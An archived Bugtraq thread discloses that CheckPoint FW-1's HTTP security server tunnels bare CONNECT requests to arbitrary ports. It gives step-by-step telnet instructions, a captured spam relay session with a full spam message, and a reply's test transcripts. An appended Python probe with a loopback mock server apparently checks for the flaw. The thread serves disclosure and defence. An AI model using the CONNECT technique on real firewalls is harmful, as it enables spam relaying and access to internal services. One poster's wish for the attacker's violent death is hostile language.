Bugtraq mailing list archives
Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
From: "Dennis Henderson" <hendo () hendohome com>
Date: Tue, 19 Feb 2002 20:32:19 -0600
William,

I was only partially able to reproduce your issue and it was only to destinations and services that my firewall would have already allowed anyway.

root@mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0

HTTP/1.0 200
220 ESMTP
helo firewall
250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you
quit
221 2.0.0 mail.xxx.com closing connection
Connection closed by foreign host.

Any other connection attempt to an IP:port that was not normally allowed by policy was denied.

root@mojo:~# telnet www.xxx.com 80
Trying 19x.1x8.xx6.1x3...
Connected to www.xxx.com.
Escape character is '^]'.
CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0

HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 85

<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
FW-1 at xxxexmfwx: Access denied.</BODY>
Connection closed by foreign host.

While it is a little startling that Checkpoint would allow this kind of connection, I was not able to actually connect to any place that I would not normally be able to connect from the internet. I do not allow http tunneling. We are running the http security server strictly to block the Nimda and Code Red attacks.

I am running 4.1 SP5

Regards
Dennis

----- Original Message -----
From: "William D. Colburn (aka Schlake)" <wcolburn () nmt edu>
To: <bugtraq () securityfocus com>; "Dan Lunceford" <dan () nmt edu>; "Ryan" <ryan () nmt edu>; <support () aquilagroup com>
Cc: "Madeline Navarrette" <mnavarre () ts checkpoint com>
Sent: Monday, February 18, 2002 6:09 PM
Subject: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
Checkpoint bounced my mail because I'm not a Checkpoint customer, so I contacted customer advocacy and resent it to a different address (this message is copied to her as well). I was told that the issue would be propagated to an appropriate person. Please drop the old message and continue to hold this message until Checkpoint responds.

I have a few updates to this issue that I have learned since I crafted the original message.

I only need to give the "CONNECT" line, and nothing else. After the second newline there is a pause and then the TCP stream is open.

I seem to be able to open any port on any machine I want *except* port 80. I was able to telnet in to UNIX login with the firewall appearing as the remote host.

The initial machine I use (inside the firewall) does not need to actually exist; I merely have to attempt to connect to an IP address "inside" on port 80.

This whole thing gives anyone outside a firewall the ability to masquerade on any TCP service (except WWW) as a machine inside the domain of the firewall.

As far as I can tell there are no logs on this, and it is hard to detect on the firewall. I found it by doing a tcpdump of all packets and gradually narrowing down my filters until I was able to "catch" an entire transaction.

----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburn () nmt edu> -----
Step one: telnet to a machine behind the Checkpoint firewall on port 80
Step two: Type the following:

CONNECT mailserver.somecompany.com:25 / HTTP/1.0
User-Agent: eeep
Cache-Control: private,no-cache
Pragma: no-cache

Step three: wait a moment for your SMTP banner to pop up.

I will attach an actual attack I captured with tcpdump and ethereal. The file is the result of an ethereal "Follow TCP stream".

I hate the person who did this to me and I hope they die a terrible death.

--
William Colburn, "Sysprog" <wcolburn () nmt edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn

--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=checkpoint

From root () netpeep nmt edu Mon Feb 18 16:05:43 2002
Return-Path: <root () netpeep nmt edu>
Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10]) by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: from netpeep.nmt.edu (localhost [127.0.0.1]) by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: (from root@localhost) by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584 for schlake () nmt edu; Mon, 18 Feb 2002 16:05:43 -0700
Date: Mon, 18 Feb 2002 16:05:43 -0700
From: root <root () netpeep nmt edu>
Message-Id: <200202182305.g1IN5h8w020584 () netpeep nmt edu>
To: schlake () nmt edu
Content-Length: 3580
Lines: 112

CONNECT mail2.freeuk.net:25 / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Cache-Control: private,no-cache
Pragma: no-cache

HELO hotmail.com
MAIL FROM: <pheros680506 () hotmail com>
RCPT TO: <renewinter () freeuk com>
RCPT TO: <renewu () freeuk com>
RCPT TO: <renfah () freeuk com>
RCPT TO: <renfi11160 () freeuk com>
RCPT TO: <renfield13 () freeuk com>
RCPT TO: <renfield20 () freeuk com>
RCPT TO: <renfield94 () freeuk com>
RCPT TO: <renfrew () freeuk com>
RCPT TO: <renfro33 () freeuk com>
RCPT TO: <reng3 () freeuk com>
RCPT TO: <renga () freeuk com>
RCPT TO: <rengel293 () freeuk com>
RCPT TO: <rengel7495 () freeuk com>
RCPT TO: <rengelh946 () freeuk com>
RCPT TO: <rengers () freeuk com>
RCPT TO: <rengised () freeuk com>
RCPT TO: <rengl21068 () freeuk com>
RCPT TO: <rengl29048 () freeuk com>
RCPT TO: <rengl78818 () freeuk com>
DATA
Reply-To: <pheros680506 () hotmail com>
Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff>
From: <pheros680506 () hotmail com>
To: <renewinter () freeuk com>
Cc: <renewu () freeuk com>, <renfah () freeuk com>, <renfi11160 () freeuk com>, <renfield13 () freeuk com>, <renfield20 () freeuk com>, <renfield94 () freeuk com>, <renfrew () freeuk com>, <renfro33 () freeuk com>, <reng3 () freeuk com>, <renga () freeuk com>, <rengel293 () freeuk com>, <rengel7495 () freeuk com>, <rengelh946 () freeuk com>, <rengers () freeuk com>, <rengised () freeuk com>, <rengl21068 () freeuk com>, <rengl29048 () freeuk com>, <rengl78818 () freeuk com>
Subject: A new fragrance (3437AlLf5-384bbsO4815hPeX5-01@27)
MiME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer:
Importance: Normal

Hi !
<HTML>
<head><title>Pheros attraction</title> </head>
<BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
<CENTER>
<TABLE WIDTH="650">
<TR>
<TD COLSPAN="2">
<FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you
this e-mail. I do not intend to
cause you harm, fill up your mailbox or bother you needlessly. I am only trying to reach those who are not as secure in their financial future as I was when I first started looking for a way to earn money online. To be removed, please go to the end of this e-mail. Please forgive me if you receive this advertisement twice.<BR><BR>
</FONT>
</TD>
</TR>
<TR>
<TD VALIGN="TOP">
<FONT FACE="VERDANA, ARIAL">
Pheros is a lovely fragrance with a touch of human pheromones, packaged in a exclusive crafted box. Pheros is a foolproof tool of seduction, the scent and the pheromones together make a foolproof combination. No one can resist the wearer of this mysterious fragrance! Pheros combines high tech science with the well-known function of the scent of a luxorious perfume.
<BR>
The price is 19.95 USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name=Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
<BR>
</FONT>
</TD>
<TD>
<IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2">
</TD>
</TR>
<TR>
<TD COLSPAN="2">
<BR>
<FONT FACE="Verdana, Arial">
To be removed from this mailing list, please reply to this message with
the subjct "remove".
You will be BLOCKED from all mail from this site and your request will
take effect within 24 hours.
</FONT>
</TD>
</TR>
</TABLE>
</CENTER>
</BODY>
</HTML>

[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz@71]

.
QUIT

--AqsLC8rIMeq19msA--

----- End forwarded message -----

--
William Colburn, "Sysprog" <wcolburn () nmt edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
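The check both messages describe, written up here as an added example; it is not part of either post and not CheckPoint code. It sends the same bare CONNECT request the thread shows and classifies the reply, with the caveat Dennis's second transcript makes visible: the security server answers "HTTP/1.0 200" whether or not the rulebase lets the tunnel through, and only the HTML page that follows says "Access denied". The loopback stand-in (FakeSecurityServer) is modelled on the two transcripts above and is an assumption in every other respect (one blank line between the 200 and the spliced-in banner, connection closed after the error page); every host name in it is invented.

```python
"""CONNECT-tunnel probe for an HTTP security server (added example).

Sends the bare CONNECT request shown in the thread and classifies the reply.
Caveat from Dennis's test: FW-1 answers "HTTP/1.0 200" even for a denied
target; only the HTML page after it says "Access denied", so the status line
alone proves nothing.  FakeSecurityServer is a loopback stand-in written for
this example, not CheckPoint code; the host names are invented.
"""
import socket
import socketserver
import threading


def connect_request(target):
    # Request line exactly as captured in the thread (the extra "/" token is
    # the attacker's; the RFC 2817 form is "CONNECT host:port HTTP/1.0").
    return (f"CONNECT {target} / HTTP/1.0\r\n"
            "User-Agent: eeep\r\n"
            "Cache-Control: private,no-cache\r\n"
            "Pragma: no-cache\r\n\r\n").encode()


def classify(raw):
    """Return (verdict, detail); verdict is tunnel, denied, refused or unknown."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return "unknown", raw               # header block not complete yet
    lines = head.split(b"\r\n")
    status = lines[0].split()
    if len(status) < 2 or status[1] != b"200":
        return "refused", lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if (headers.get(b"content-type", b"").startswith(b"text/html")
            and b"Access denied" in body):
        return "denied", body               # 200 followed by the FW-1 error page
    return "tunnel", body                   # 200 followed by the far side's banner


def connect_probe(host, port, target, timeout=3.0):
    """Send CONNECT target via host:port and read until a banner line arrives,
    the peer closes (FW-1 does after its error page) or the timeout hits."""
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(connect_request(target))
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            raw += chunk
            _, sep, body = raw.partition(b"\r\n\r\n")
            if sep and body.endswith(b"\n"):
                break
    return classify(raw)


class _Handler(socketserver.StreamRequestHandler):
    """Mimics the observed FW-1 behaviour: answer 200 first, apply the rulebase second."""
    DENY_PAGE = (b"<TITLE>Error</TITLE>\n<BODY>\n<H1>Error</H1>\n"
                 b"FW-1 at fake-fw: Access denied.</BODY>")

    def handle(self):
        request_line = self.rfile.readline()
        while self.rfile.readline() not in (b"\r\n", b"\n", b""):
            pass                            # drain the request headers
        parts = request_line.split()
        if len(parts) < 2 or parts[0] != b"CONNECT":
            self.wfile.write(b"HTTP/1.0 400 Bad Request\r\n\r\n")
            return
        banner = self.server.policy.get(parts[1].decode(errors="replace"))
        if banner is None:
            self.wfile.write(b"HTTP/1.0 200\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n"
                             b"Content-Type: text/html\r\nContent-Length: %d\r\n\r\n"
                             % len(self.DENY_PAGE) + self.DENY_PAGE)
        else:                               # rulebase permits it: splice the banner in
            self.wfile.write(b"HTTP/1.0 200\r\n\r\n" + banner)


class FakeSecurityServer(socketserver.ThreadingTCPServer):
    def __init__(self, policy):
        super().__init__(("127.0.0.1", 0), _Handler)
        self.policy = policy                # {"host:port": banner} for allowed targets


def demo():
    """Run both of Dennis's probes against the loopback stand-in."""
    srv = FakeSecurityServer({"mail.example.test:25": b"220 mail.example.test ESMTP\r\n"})
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        host, port = srv.server_address
        return {t: connect_probe(host, port, t)[0]
                for t in ("mail.example.test:25", "mail.example.test:22")}
    finally:
        srv.shutdown()
        srv.server_close()
```

demo() returns "tunnel" for the port 25 target and "denied" for port 22, matching the two transcripts. Against a real security server, point connect_probe at the web-facing address only on a network you are authorised to test, and treat "tunnel" for any target the rulebase should not allow as the finding; since the report above says the firewall logs nothing for these sessions, a CONNECT request line arriving on a port 80 listener is also what to look for in a packet capture.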
Current thread:
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] William D. Colburn (aka Schlake) (Feb 19)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Dennis Henderson (Feb 19)
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Steve VanDevender (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Randal L. Schwartz (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Jason Haar (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Ronald F. Guilmette (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)